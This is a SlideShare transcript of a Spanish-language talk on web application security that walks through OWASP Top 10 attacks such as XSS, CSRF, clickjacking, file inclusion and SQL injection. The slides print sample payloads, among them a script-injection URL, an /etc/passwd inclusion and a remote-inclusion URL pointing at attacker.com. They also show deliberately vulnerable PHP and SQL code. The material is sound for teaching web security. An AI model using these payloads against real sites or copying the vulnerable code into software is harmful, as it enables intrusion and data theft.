SlideShare una empresa de Scribd logo
1 de 28
IV Obradoiro de Criptografía, Privacidade e Seguridade



   Seguridad en Aplicaciones Web


                 Jose Mato Mariño
                       (FIC)
¿Cómo aprender seguridad web en la
                                FIC?
BBDD
Redes
PSI
IU

PHP
Javascript
SQL
You are sexy and they know it!!

SPAM
Robo información
Distribución Malware
Botnets
Viagra
OWASP Top 10 - 2010




Guia de prácticas y recomendaciones que deben
tenerse en cuenta en el desarrollo seguro de
aplicaciones web.

Aparecen las 10 técnicas más explotadas a la hora
de hackear o atacar una aplicación web.
OWASP TOP 10 – Del 2007 al 2010
Cross Site Scripting (XSS)
Técnica de inyección de comandos en el lado del
  cliente (navegador)
Lo que se busca es vulnerar al cliente, con el cuál
  sería posible llegar a vulnerar el servidor
Se inyecta código en parámetros que son recibidos
  por la Aplicación Web Y que son entregados
  directamente al cliente, donde se ejecutarán
Al ejecutarse en el navegador se tiene acceso al
  100% de los datos de sesión del cliente dando
  lugar a un montón de ataques distintos
XSS – FAILS eu2010
XSS – FAILS movistar
XSS - Reflected
El código no está en los repositorios de datos

La inyección va en un parámetro de la url por GET

El usuario tiene que hacer clic en un enlace
  preparado

http://example.com=buscar.php=
  <script>alert('XSS');</script>
XSS - Persistent
La inyección se almacena dentro de los repositorios
 de datos del servidor

Cuando alguien acceda a ese contenido se
 ejecutará (no hace falta que el usuario haga clic)
XSS - Consecuencias
Secuestrar el navegador de otro usuario, robo de
 sesión
Capturar información sensible que vean los usuarios
Defacement, phishing...
Envío dirigidos de exploits basados en navegador,
 BlackHole
Escaneo de puertos de equipos internos (en la red
 del usuario)
DEMO


XSS REFLECTED

ROBO DE SESIÓN
XSS - CSRF
Cross Site Request Forgery
Permite realizar acciones en la aplicación web
 vulnerada como si fuese el propio usuario el que
 las realiza

http://example.com?
  buscar.php=<script>document.location=
  'traspasar_jugador.php?
  player=Benzema&friend=Renata'</script>
XSS - Clickjacking
Inyección de iframe
Se carga una web (la ve el usuario)
Se pone capa transparente encima
El usuario hace clic en la web …
… pero antes en la capa transparente :)
Robo de clics => Autorizar acciones

Activar webcam, likejacking, tapjacking, ...
DEMO




ClickJacking

LikeJacking
Local File Inclusion (LFI)
El atacante intentará leer archivos a los que no tiene acceso




http://example.com/index.php?module=/etc/passwd
Remote File Inclusion (RFI)
Se inyecta un script (php, jsp, aspx, …) en la
 aplicación vulnerable
Webshell
Control del servidor

http://example.com/index.php?
  module=http://attacker.com/script.php

<?php require_once $_GET['module']; ?>
INSECURE OBJECT REFERENCE
http://example.com/expediente.php?alumno=1536

El atacante se da cuenta que 1536 es su
  identificador de alumno
El atacante modifica ese valor por otro
Accede a los expedientes de otros alumnos
El parámetro vulnerable puede estar en las
  peticiones por ajax (POST, GET)
SQL Injection
Técnica que
consiste en
modificar las
consultas al
origen de datos
alterádolas
para conseguir
nuestros
objetivos
SQL Injection - Objetivos
Suplantación de roles (usuario a admin)
Acceso a zonas no autorizadas
Información confidencial
Leer archivos del servidor (/etc/passwd,
  /etc/shadow)
Infección del site
…
SQL Injection - Lilupophilupop
Buscaba vulnerabilidades SQL Injection en dominios
 bajo ASP o Coldfusion con base de datos
 Microsoft SQL Server

Más de 1,000.000 de dominios afectados utilizados
 para distribuir malware, redirigiendo a los usuarios
 con XSS Persistente
SQL Injection - Lilupophilupop
SQL Injection - HBGary
http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27
Listado de usuario con claves hasheadas
PERO Aaron Barr tenía letras minúsculas y números
  únicamente, por lo tanto...
Acceso al CMS
Reseteo claves correo a Aaron Barr
Ingeniería Social => acceso correo => SSH
NOTA: Aaron Barr utilizaba la
misma clave para varios servicios
SQL Injection - DEMO

    Buscar la vulnerabilidad
1. Nº de columnas
2. Tablas y BBDD
3. Columnas de tabla usuarios
4. Emails y passwords
5. Login :)
SQL Injection - MySQL
SELECT schema_name FROM
 information_schema.SCHEMATA

SELECT table_schema,table_name FROM
 information_schema.TABLES

SELECT column_name,column_type FROM
 information_schema.COLUMNS WHERE
 table_name='%s' AND table_schema='%s'
SQL Injection



login.php

SELECT *
FROM usuarios
WHERE email = '$_GET['email']'
AND password = '$_GET['password]'
Seguridad CMS



Plugins
Wordpress => wpscan
Joomla => joomlascan
IV Obradoiro de Criptografía, Privacidade e Seguridade




               [EOF]
             Gracias :)
                Jose Mato Mariño
                      (FIC)

Más contenido relacionado

La actualidad más candente

[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP7th_Sign
 
Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)Alonso Caballero
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Miguel de la Cruz
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPMoises Silva
 
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...mauromaulinir
 
Azpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internetAzpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internetAzpe Informatica
 
Navegar correctamente en internet
Navegar correctamente en internetNavegar correctamente en internet
Navegar correctamente en internetXitalia
 
Dns malware iicybersecurity
Dns malware iicybersecurityDns malware iicybersecurity
Dns malware iicybersecurityDavid Thomas
 
Taller 3 informatika recursos
Taller 3 informatika recursosTaller 3 informatika recursos
Taller 3 informatika recursosssparza_abril
 
Presentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internetPresentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internetmatichino
 
Amenazas en la web
Amenazas en la webAmenazas en la web
Amenazas en la webSandy Ortega
 
Trabajo de informatica
Trabajo de informaticaTrabajo de informatica
Trabajo de informaticaPR7ALCOR
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017yopablo
 

La actualidad más candente (20)

[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
 
Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0
 
Seguridad en php
Seguridad en phpSeguridad en php
Seguridad en php
 
as
asas
as
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHP
 
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
 
Azpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internetAzpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internet
 
Navegar correctamente en internet
Navegar correctamente en internetNavegar correctamente en internet
Navegar correctamente en internet
 
Seguridad de las web 2.0
Seguridad de las web 2.0Seguridad de las web 2.0
Seguridad de las web 2.0
 
Que es xss
Que es xssQue es xss
Que es xss
 
web 1.0, 2.0 y 3.0
web 1.0, 2.0 y 3.0web 1.0, 2.0 y 3.0
web 1.0, 2.0 y 3.0
 
Dns malware iicybersecurity
Dns malware iicybersecurityDns malware iicybersecurity
Dns malware iicybersecurity
 
Taller 3 informatika recursos
Taller 3 informatika recursosTaller 3 informatika recursos
Taller 3 informatika recursos
 
Presentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internetPresentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internet
 
Amenazas en la web
Amenazas en la webAmenazas en la web
Amenazas en la web
 
Trabajo de informatica
Trabajo de informaticaTrabajo de informatica
Trabajo de informatica
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 

Similar a Seguridad en aplicaciones web

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applicationsEventos Creativos
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebEduardo Jalon
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosAlonso Caballero
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 

Similar a Seguridad en aplicaciones web (20)

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Seguridad en PHP (es)
Seguridad en PHP (es)Seguridad en PHP (es)
Seguridad en PHP (es)
 
WebAttack - Presentación
WebAttack - PresentaciónWebAttack - Presentación
WebAttack - Presentación
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Web app attacks
Web app attacksWeb app attacks
Web app attacks
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación Web
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de Comandos
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 

Último

programa dia de las madres 10 de mayo para evento
programa dia de las madres 10 de mayo  para eventoprograma dia de las madres 10 de mayo  para evento
programa dia de las madres 10 de mayo para eventoDiegoMtsS
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdfgimenanahuel
 
La Función tecnológica del tutor.pptx
La  Función  tecnológica  del tutor.pptxLa  Función  tecnológica  del tutor.pptx
La Función tecnológica del tutor.pptxJunkotantik
 
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdfResolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfAngélica Soledad Vega Ramírez
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónLourdes Feria
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadAlejandrino Halire Ccahuana
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.José Luis Palma
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADOJosé Luis Palma
 
La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.amayarogel
 
Identificación de componentes Hardware del PC
Identificación de componentes Hardware del PCIdentificación de componentes Hardware del PC
Identificación de componentes Hardware del PCCesarFernandez937857
 
Herramientas de Inteligencia Artificial.pdf
Herramientas de Inteligencia Artificial.pdfHerramientas de Inteligencia Artificial.pdf
Herramientas de Inteligencia Artificial.pdfMARIAPAULAMAHECHAMOR
 
Introducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo SostenibleIntroducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo SostenibleJonathanCovena1
 
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptDE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptELENA GALLARDO PAÚLS
 
Heinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoHeinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoFundación YOD YOD
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxAna Fernandez
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptxFelicitasAsuncionDia
 

Último (20)

programa dia de las madres 10 de mayo para evento
programa dia de las madres 10 de mayo  para eventoprograma dia de las madres 10 de mayo  para evento
programa dia de las madres 10 de mayo para evento
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf
 
La Función tecnológica del tutor.pptx
La  Función  tecnológica  del tutor.pptxLa  Función  tecnológica  del tutor.pptx
La Función tecnológica del tutor.pptx
 
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdfResolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
Resolucion de Problemas en Educacion Inicial 5 años ED-2024 Ccesa007.pdf
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcción
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdad
 
Repaso Pruebas CRECE PR 2024. Ciencia General
Repaso Pruebas CRECE PR 2024. Ciencia GeneralRepaso Pruebas CRECE PR 2024. Ciencia General
Repaso Pruebas CRECE PR 2024. Ciencia General
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
 
La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.
 
Identificación de componentes Hardware del PC
Identificación de componentes Hardware del PCIdentificación de componentes Hardware del PC
Identificación de componentes Hardware del PC
 
Herramientas de Inteligencia Artificial.pdf
Herramientas de Inteligencia Artificial.pdfHerramientas de Inteligencia Artificial.pdf
Herramientas de Inteligencia Artificial.pdf
 
Introducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo SostenibleIntroducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo Sostenible
 
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.pptDE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
DE LAS OLIMPIADAS GRIEGAS A LAS DEL MUNDO MODERNO.ppt
 
Heinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoHeinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativo
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docx
 
Defendamos la verdad. La defensa es importante.
Defendamos la verdad. La defensa es importante.Defendamos la verdad. La defensa es importante.
Defendamos la verdad. La defensa es importante.
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptx
 
Sesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdfSesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdf
 

Seguridad en aplicaciones web

  • 1. IV Obradoiro de Criptografía, Privacidade e Seguridade Seguridad en Aplicaciones Web Jose Mato Mariño (FIC)
  • 2. ¿Cómo aprender seguridad web en la FIC? BBDD Redes PSI IU PHP Javascript SQL
  • 3. You are sexy and they know it!! SPAM Robo información Distribución Malware Botnets Viagra
  • 4. OWASP Top 10 - 2010 Guia de prácticas y recomendaciones que deben tenerse en cuenta en el desarrollo seguro de aplicaciones web. Aparecen las 10 técnicas más explotadas a la hora de hackear o atacar una aplicación web.
  • 5. OWASP TOP 10 – Del 2007 al 2010
  • 6. Cross Site Scripting (XSS) Técnica de inyección de comandos en el lado del cliente (navegador) Lo que se busca es vulnerar al cliente, con el cuál sería posible llegar a vulnerar el servidor Se inyecta código en parámetros que son recibidos por la Aplicación Web Y que son entregados directamente al cliente, donde se ejecutarán Al ejecutarse en el navegador se tiene acceso al 100% de los datos de sesión del cliente dando lugar a un montón de ataques distintos
  • 7. XSS – FAILS eu2010
  • 8. XSS – FAILS movistar
  • 9. XSS - Reflected El código no está en los repositorios de datos La inyección va en un parámetro de la url por GET El usuario tiene que hacer clic en un enlace preparado http://example.com=buscar.php= <script>alert('XSS');</script>
  • 10. XSS - Persistent La inyección se almacena dentro de los repositorios de datos del servidor Cuando alguien acceda a ese contenido se ejecutará (no hace falta que el usuario haga clic)
  • 11. XSS - Consecuencias Secuestrar el navegador de otro usuario, robo de sesión Capturar información sensible que vean los usuarios Defacement, phishing... Envío dirigidos de exploits basados en navegador, BlackHole Escaneo de puertos de equipos internos (en la red del usuario)
  • 13. XSS - CSRF Cross Site Request Forgery Permite realizar acciones en la aplicación web vulnerada como si fuese el propio usuario el que las realiza http://example.com? buscar.php=<script>document.location= 'traspasar_jugador.php? player=Benzema&friend=Renata'</script>
  • 14. XSS - Clickjacking Inyección de iframe Se carga una web (la ve el usuario) Se pone capa transparente encima El usuario hace clic en la web … … pero antes en la capa transparente :) Robo de clics => Autorizar acciones Activar webcam, likejacking, tapjacking, ...
  • 16. Local File Inclusion (LFI) El atacante intentará leer archivos a los que no tiene acceso http://example.com/index.php?module=/etc/passwd
  • 17. Remote File Inclusion (RFI) Se inyecta un script (php, jsp, aspx, …) en la aplicación vulnerable Webshell Control del servidor http://example.com/index.php? module=http://attacker.com/script.php <?php require_once $_GET['module']; ?>
  • 18. INSECURE OBJECT REFERENCE http://example.com/expediente.php?alumno=1536 El atacante se da cuenta que 1536 es su identificador de alumno El atacante modifica ese valor por otro Accede a los expedientes de otros alumnos El parámetro vulnerable puede estar en las peticiones por ajax (POST, GET)
  • 19. SQL Injection Técnica que consiste en modificar las consultas al origen de datos alterádolas para conseguir nuestros objetivos
  • 20. SQL Injection - Objetivos Suplantación de roles (usuario a admin) Acceso a zonas no autorizadas Información confidencial Leer archivos del servidor (/etc/passwd, /etc/shadow) Infección del site …
  • 21. SQL Injection - Lilupophilupop Buscaba vulnerabilidades SQL Injection en dominios bajo ASP o Coldfusion con base de datos Microsoft SQL Server Más de 1,000.000 de dominios afectados utilizados para distribuir malware, redirigiendo a los usuarios con XSS Persistente
  • 22. SQL Injection - Lilupophilupop
  • 23. SQL Injection - HBGary http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27 Listado de usuario con claves hasheadas PERO Aaron Barr tenía letras minúsculas y números únicamente, por lo tanto... Acceso al CMS Reseteo claves correo a Aaron Barr Ingeniería Social => acceso correo => SSH NOTA: Aaron Barr utilizaba la misma clave para varios servicios
  • 24. SQL Injection - DEMO Buscar la vulnerabilidad 1. Nº de columnas 2. Tablas y BBDD 3. Columnas de tabla usuarios 4. Emails y passwords 5. Login :)
  • 25. SQL Injection - MySQL SELECT schema_name FROM information_schema.SCHEMATA SELECT table_schema,table_name FROM information_schema.TABLES SELECT column_name,column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'
  • 26. SQL Injection login.php SELECT * FROM usuarios WHERE email = '$_GET['email']' AND password = '$_GET['password]'
  • 27. Seguridad CMS Plugins Wordpress => wpscan Joomla => joomlascan
  • 28. IV Obradoiro de Criptografía, Privacidade e Seguridade [EOF] Gracias :) Jose Mato Mariño (FIC)

Notas del editor

  1. qwer